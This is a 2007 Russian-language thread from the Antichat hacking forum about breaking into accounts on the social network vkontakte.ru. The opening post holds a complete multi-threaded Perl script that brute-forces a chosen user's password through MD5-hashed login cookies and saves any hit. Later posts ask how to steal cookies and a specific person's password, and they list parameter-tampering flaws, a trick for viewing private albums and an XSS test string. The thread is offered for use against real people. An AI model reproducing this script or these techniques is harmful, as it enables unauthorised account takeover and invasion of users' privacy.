Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
15.08.2007, 03:19
|
|
Постоянный
Регистрация: 05.06.2007
Сообщений: 335
Провел на форуме:
4319431
Репутация:
677
|
|
так как народ стучит в аську и спрашивает почему не работает скрипт, выкладываю исправленную версию, так как баг с куками прикрыли теперь нужно знать мыло
Код:
#!/usr/bin/perl
use IO::Socket;
use MD5;
use threads;
use threads::shared;
my @pass : shared;
##########################################
# C!klodoL
# vkontakte.ru bruteforce with multi-threads
##########################################
$dic = 'pass.txt'; #словарь паролей
$id = 111111; #id цели
$mail = 'mail%40mail.com'; #мыло, вместо @ вписать %40
$threads = 4; #количество потоков
##########################################
open (pass, "<$dic");
Next:
@pass = pass();
for(0..$threads) {$trl[$_] = threads->create(\&Brut, $_);}
for(@trl) { $_->join; }
sub Brut
{
while (@pass){
$pass = shift @pass;
$md5 = MD5->hexhash($pass);
$sock = IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>'vkontakte.ru',PeerPort=>80);
print $sock "HEAD http://vkontakte.ru/ HTTP/1.0\r\n".
"Host: vkontakte.ru\r\n".
"Accept: */*\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"User-Agent: Mozillo\r\n".
"Cookie: remixchk=2; remixmid=$id; remixemail=$mail; remixpass=$md5\r\n".
"Connection: close\r\n\r\n";
$answ = <$sock>;
close $sock;
print "$pass $answ";
if ($answ =~ /302/){
open (good, '>>good.txt');
print good "$id:$pass:$md5\n";
print "$id:$pass:$md5\n";
close good;
exit;}
}
}
goto Next;
sub pass
{
my (@mas);
while (<pass>){
push @mas, $_;
last if (@mas > 500);
}
chomp @mas;
return @mas;
}
Может Павлик даже больше чем просто программист=)
сегодня заметил что у павлика миранда даже ip не скрывает 8)
Последний раз редактировалось C!klodoL; 23.08.2007 в 10:27..
Причина: замена кода
|
|
|
07.09.2007, 17:16
|
|
Новичок
Регистрация: 18.05.2007
Сообщений: 8
Провел на форуме:
34417
Репутация:
4
|
|
Можно украсть cookies пользователя и поставить их на свою машину, как это сделано на примере mail.ru. Только как их тиснуть?
|
|
|
|
04.10.2007, 00:46
|
|
Познающий
Регистрация: 29.08.2005
Сообщений: 97
Провел на форуме:
772501
Репутация:
38
|
|
кто поднаторел в этом деле может мне помоч, надо узнать пас чела там
|
|
|
|
06.10.2007, 15:37
|
|
Guest
Сообщений: n/a
Провел на форуме:
Репутация:
|
|
Интересно, а узнать мыло можно? Не прибегая к соц. инженерии...  |
|
|
|
06.10.2007, 22:21
|
|
Участник форума
Регистрация: 05.08.2007
Сообщений: 236
Провел на форуме:
4625160
Репутация:
457
|
|
Нашел пару ошибок:
http://vkontakte.ru/invite.php?m=1&email[]=&first_name[]=&last_name[]=
Параметр "m" можно указать самому
http://vkontakte.ru/invite.php?m=2&email[]=&first_name[]=&last_name[]=
http://vkontakte.ru/invite.php?m=3&email[]=&first_name[]=&last_name[]=
http://vkontakte.ru/invite.php?m=4&email[]=&first_name[]=&last_name[]=
+ при ретриве пасса на мыло можно указать что угодно,и будет показано сообщение об успешной отправке )
В принципе ничего серьезного,так мелочи
|
|
|
|
07.10.2007, 02:31
|
|
Познающий
Регистрация: 15.01.2007
Сообщений: 41
Провел на форуме:
267196
Репутация:
6
|
|
Xss бы.., эх..
|
|
|
|
07.10.2007, 02:44
|
|
Guest
Сообщений: n/a
Провел на форуме:
Репутация:
|
|
Сообщение от lsass.exe
Нашел пару ошибок:
http://vkontakte.ru/invite.php?m=1&email[]=&first_name[]=&last_name[]=
Параметр "m" можно указать самому
http://vkontakte.ru/invite.php?m=2&email[]=&first_name[]=&last_name[]=
http://vkontakte.ru/invite.php?m=3&email[]=&first_name[]=&last_name[]=
http://vkontakte.ru/invite.php?m=4&email[]=&first_name[]=&last_name[]=
+ при ретриве пасса на мыло можно указать что угодно,и будет показано сообщение об успешной отправке )
В принципе ничего серьезного,так мелочи
А по подробнее, плиз... реально интересно... 
|
|
|
|
05.11.2007, 10:05
|
|
Guest
Сообщений: n/a
Провел на форуме:
Репутация:
|
|
а никто не задумывался как смотреть закрытые альбомы?
ведь если просто так жипегу он показывает значит ничего такого сильно сложного тама нет... вопрос только как к самой пикче подобраться
|
|
|
|
06.11.2007, 22:33
|
|
Участник форума
Регистрация: 07.08.2007
Сообщений: 139
Провел на форуме:
2063900
Репутация:
138
|
|
Там есть группа <script language="JavaScript">alert("xak")</script>. Они этот вопрос поднимали уже. Поищи в обсуждениях
|
|
|
|
07.11.2007, 04:24
|
|
Постоянный
Регистрация: 05.06.2007
Сообщений: 335
Провел на форуме:
4319431
Репутация:
677
|
|
Сообщение от ыть
а никто не задумывался как смотреть закрытые альбомы?
ведь если просто так жипегу он показывает значит ничего такого сильно сложного тама нет... вопрос только как к самой пикче подобраться
раньше можно было смотреть просто изменив ссылку, сейчас по моему уже нет
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
